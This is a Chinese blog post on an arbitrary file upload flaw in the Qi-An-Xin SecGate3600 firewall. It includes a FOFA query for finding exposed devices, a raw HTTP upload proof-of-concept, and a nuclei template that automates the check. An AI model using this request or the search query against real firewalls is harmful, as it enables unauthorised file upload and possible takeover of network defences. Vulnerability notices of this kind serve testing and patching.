奇安信网神任意文件上传漏洞

已于 2024-02-04 15:30:51 修改
阅读量573 收藏
点赞数 2
文章标签: web安全 安全
于 2024-02-04 15:30:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136026973
版权
文章报道了奇安信网神SecGate3600防火墙上存在的obj_area_import_save任意文件上传漏洞,提供CVE编号和POC示例,建议用户及时更新到最新版本以修复这一高危漏洞。
摘要由CSDN通过智能技术生成

1.漏洞介绍

奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:fid=“1Lh1LHi6yfkhiO83I59AYg==”

5.POC
POST /?g=app_av_import_save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 515
Content-Type: multipart/form-data; boundary=----peormgefskbofgfgrcvaivswdc
Accept-Encoding: gzip, deflate

------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="upfile"; filename="npwnox.txt"
Content-Type: text/plain

djbheqvmmyguhksmioge
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------peormgefskbofgfgrcvaivswdc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------peormgefskbofgfgrcvaivswdc--

在这里插入图片描述
https://127.0.0.1/attachements/npwnox.txt
在这里插入图片描述

nuclei检测


id: qianxin-secworld-secgate3600-obj_area_import_save-fileupload

info:
  name: 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
  author: fgz
  severity: critical
  description: 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞
  metadata:
    max-request: 1
    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
    verified: true
variables:
  file_name: "{{to_lower(rand_text_alpha(6))}}"
  file_content: "{{to_lower(rand_text_alpha(20))}}"
  rboundary: "{{to_lower(rand_text_alpha(26))}}"
requests:
  - raw:
      - |+
        POST /?g=app_av_import_save HTTP/1.1
        Host: {{Hostname}} 
        Content-Type: multipart/form-data; boundary=----{{rboundary}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
        
        ------{{rboundary}}
        Content-Disposition: form-data; name="MAX_FILE_SIZE"
        
        10000000
        ------{{rboundary}}
        Content-Disposition: form-data; name="upfile"; filename="{{file_name}}.txt"
        Content-Type: text/plain
        
        {{file_content}}
        ------{{rboundary}}
        Content-Disposition: form-data; name="submit_post"
        
        obj_app_upfile
        ------{{rboundary}}
        Content-Disposition: form-data; name="__hash__"
        
        0b9d6b1ab7479ab69d9f71b05e0e9445
        ------{{rboundary}}--

      - |
        GET /attachements/{{file_name}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
奇安信天擎管理中心rptsvr接口任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-04 305
奇安信天擎管理中心rptsvr接口任意文件上传漏洞(含批量验证poc)
网神 SecGate 3600 防火墙 app_av_import_save文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-05 74
网神 SecGate 3600 防火墙 app_av_import_save文件上传漏洞(含批量验证poc)
奇安信代码卫士,文件上传漏洞解决demo
04-23
奇安信代码卫士,文件上传漏洞解决demo; #### 文件上传可以参考以下安全需求进行处理: 1. 服务器配置: (1)将上传目录和上传文件设置为不可执行, 杜绝脚本执行。 (2)应保证服务器安全,避免文件解析漏洞。 2. 在服务端对上传文件进行检查: (1)使用白名单控制上传文件类型,即只允许指定扩展名的文件上传。 (2)对上传文件后缀与MIME Type进行匹配校验, 对文件头信息与文件后缀进行匹配校验。 (3)对单个文件大小和总文件数进行限制, 避免拒绝服务攻击。 (4)对文件名进行输入校验,显示时进行输出编码。 3. 文件存储: (1)上传文件应保存在指定路径下。 (2)对上传文件进行随机数重命名,避免文件被覆盖。 (3)设置上传文件路径, 使用户不能轻易访问自己上传的文件 。 (4) 文件应尽量保存在内容服务器或web目录外部,避免通过web应用直接访问上传的文件。 4. 对于图片文件进行二次渲染、压缩, 避免图片写马。 5. 校验失败后,记录错误日志信息,内容至少包括时间、用户、IP、操作内容、校验失败
2024-HW最新漏洞整理及相应解决方案(十一)
m0_72210904的博客
08-09 537
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
文件上传漏洞
YoungHD的博客
06-16 613
什么是文件上传漏洞文件上传漏洞指用户上传了一个可执行脚本文件,并且通过此脚本文件获得了执行服务器端端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意脚本并执行从而控制服务器。上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件。 什么是webshell? web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限。webshell一般.
10.任意文件上传漏洞(超详细!!!)
m0_72760503的博客
08-03 1055
任意文件下载漏洞:允许攻击者从服务器下载任意文件,这可能导致敏感信息泄露、服务器被控制等安全风险。这种漏洞通常由于应用程序没有对用户输入进行充分的验证和过滤而导致攻击者可以利用多种技术来执行任意文件下载,包括本地文件包含(LFI)、远程文件包含(RFI)、目录遍历和服务器端请求伪造(SSRF)等。这些技术通常通过构造特殊的URL参数或请求头来实现,例如使用…/进行目录遍历或利用文件读取函数的漏洞来读取服务器上的敏感文件。
网神SecGate3600防火墙obj_app_upfile 接口存在任意文件上传漏洞
qq_39342001的博客
03-17 220
网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
漏洞复现】网神-SecGate-3600防火墙-sys_hand-任意文件上传
知黑而守白
01-18 449
网神 SecGate3600 防火墙(以下简称为:防火墙)是奇安信集团自主创新的新一代防火墙安全系统,基于 NDR(基于网络的检测与响应)安全体系,在高性能和先进架构的支撑下,集成了防火墙、VPN、应用与身份识别、防病毒、入侵防御、虚拟系统、行为管理、应用层内容安全防护、威胁情报等综合安全防御功能,并支持与天眼、终端管理系统、NGSOC、天御云等多系统进行协同防御。网神 SecGate3600 防火墙某接口处存在文件上传漏洞,攻击者可以通过构特殊的数据包上传恶意代码文件到系统,从而带来严重安全威胁。
奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过
weixin_43567873的博客
03-08 352
奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过
网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
weixin_43567873的博客
04-05 61
网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1030
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
网神SecGate 3600防火墙 app_av_import_save接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-08 380
网神 SecGate 3600 防火墙 app_av_import_save接口存在任意文件上传漏洞,可上传恶意文件至服务器。
文件上传漏洞修改方案
junbj的博客
07-06 3679
文件上传漏洞
奇安信代码卫士:文件上传漏洞解决Demo推荐
最新发布
gitblog_06652的博客
09-26 577
奇安信代码卫士:文件上传漏洞解决Demo推荐 【下载地址】奇安信代码卫士文件上传漏洞解决Demo 本资源文件提供了一个关于奇安信代码卫士的文件上传漏洞解决Demo。该Demo旨在帮助开发者理解和实施安全文件上传机制,以防止常见的文件上传漏洞 ...
奇安信安全漏洞】XSS漏洞 重定向漏洞解决及产生分析!_奇安信漏洞(1)
2303_79055586的博客
04-28 477
应用程序的客户端代码从javaScript、document.location、request url、document.url、document.referrer。或者其他任何攻击者可以修改的浏览器对象获取数据、如果未验证数据是否存在恶意代码的情况下,就将其动态的更新到页面的DOM节点,应用程序将易于收到基于DOM的XSS攻击。既然都明确说明了是从客户端获取的数据,需要校验后才可以使用,那思路就清晰了。也并不是简单的校验字符而已!
网神 SecGate 3600 防火墙两处接口文件上传(含批量验证poc)
04-12 459
网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙,是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备,支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能,能够有效地保证网络的安全;产品提供灵活的网络路由/桥接能力,支持策略路由,多出口链路聚合;提供多种智能分析和管理手段,支持邮件告警,支持日志审计,提供全面的网络管理监控,协助网络管理员完成网络的安全管理。
HorizontCMS文件上传漏洞复现(CVE-2020-28693)
玄道的网安博客
12-18 824
简介 HorizontCMS是个人开发者的一个客户关系管理 Web 平台。 洞概述 该漏洞源于不受限制的文件上传,攻击者可利用该漏洞通过上传一个主题来通过zip文件上传PHP代码,并通过HTTP GET请求对主题< PHP文件名>执行PHP文件。 影响版本 HorizontCMS 1.0.0-beta 存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/ttimot24/HorizontCMS/tree/bootstrap-v4 安装教程可以参考官方教程
奇安信常见安全漏洞及修复
qiaosaifei的博客
01-10 4611
奇安信常见安全漏洞问题及修复
奇安信网神代码卫士系统使用指南
"奇安信网神代码卫士系统是一款由奇安信集团提供的网络安全解决方案,专注于保护政府、军队、企业、教育、金融等机构的代码安全。此系统旨在检测和防止潜在的网络安全威胁,确保代码质量并提高整体网络安全防护能力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值